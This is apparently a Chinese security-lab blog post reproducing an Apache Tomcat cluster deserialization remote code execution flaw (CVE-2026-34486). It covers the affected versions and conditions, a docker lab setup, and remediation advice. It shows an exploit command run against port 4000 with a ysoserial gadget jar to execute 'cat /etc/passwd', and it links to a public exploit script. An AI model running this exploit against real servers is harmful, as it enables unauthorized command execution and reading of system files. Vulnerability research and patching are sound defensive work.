文章总结： 该文档详细分析了ApacheTomcat远程代码执行漏洞CVE-2026-34486，该漏洞因修复CVE-2026-29146时导致敏感数据加密缺失，可能允许绕过EncryptInterceptor。影响版本包括Tomcat11.0.20、10.1.53和9.0.116，攻击者可访问集群通信端口利用反序列化链执行任意命令。文档提供了完整的漏洞复现步骤、检测规则和修复建议，包括升级补丁和限制端口访问。 综合评分： 85 文章分类： 漏洞分析,漏洞预警,实战经验,安全工具,WEB安全

【成功复现】Apache Tomcat远程代码执行漏洞(CVE-2026-34486)

原创

弥天安全实验室 弥天安全实验室

弥天安全实验室

2026年4月16日 12:17 陕西

在小说阅读器读本章

去阅读

#

网安引领时代，弥天点亮未来

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

Apache Tomcat是美国阿帕奇（Apache）基金会的一款轻量级Web应用服务器。用于实现对Servlet和JavaServer Page（JSP）的支持。

Apache Tomcat 11.0.20版本、10.1.53版本和9.0.116版本存在安全漏洞，该漏洞源于修复CVE-2026-29146时导致敏感数据加密缺失，可能允许绕过EncryptInterceptor。

0x02影响版本

Apache Tomcat 11.0.20

Apache Tomcat 10.1.53

Apache Tomcat 9.0.116

1、Tomcat 服务器开启Tribes 集群功能。

2、集群通信配置了EncryptInterceptor 拦截器。

3、攻击者可访问Tomcat 服务器的集群通信端口（默认为TCP4000端口）。

4、目标服务器的 Java 类路径（Classpath）中存在可利用的反序列化Gadget 链。

0x03漏洞复现

1.访问环境

通过docker搭建

docker run -d \  --name tomcat-cve-2026-34486 \  -p 8080:8080 \  -p 4000:4000 \  nowday3/cve-2026-34486:latest

漏洞环境

2.漏洞复现

执行命令

cat /etc/passwd

python3 CVE-2026-34486.py -t 192.168.3.28 -p 4000 --rce "cat /etc/passwd" --ysoserial ysoserial-all.jar --tomcat-lib apache-tomcat-9.0.116/lib

执行命令id

部分流量

执行命令

已输出检测双向规则

0x04修复建议****

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

临时缓解方案

1、在 WAF、IDS/IPS 中部署基于 POC 的检测规则，识别针对该漏洞的探测与攻击行为。

2、严格限制Tomcat集群通信端口的访问来源，通过白名单等方式。

  建议尽快升级修复漏洞，再次声明本文仅供学习使用，非法他用责任自负！

https://tomcat.apache.org/download-11.cgihttps://github.com/404-src/CVE-2026-34486/blob/main/exp.py

弥天简介

学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。

口号 网安引领时代，弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫，

予以风动，

必降弥天之润！

弥  天

安全实验室

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：弥天安全实验室 弥天安全实验室 弥天安全实验室《【成功复现】Apache Tomcat远程代码执行漏洞(CVE-2026-34486)》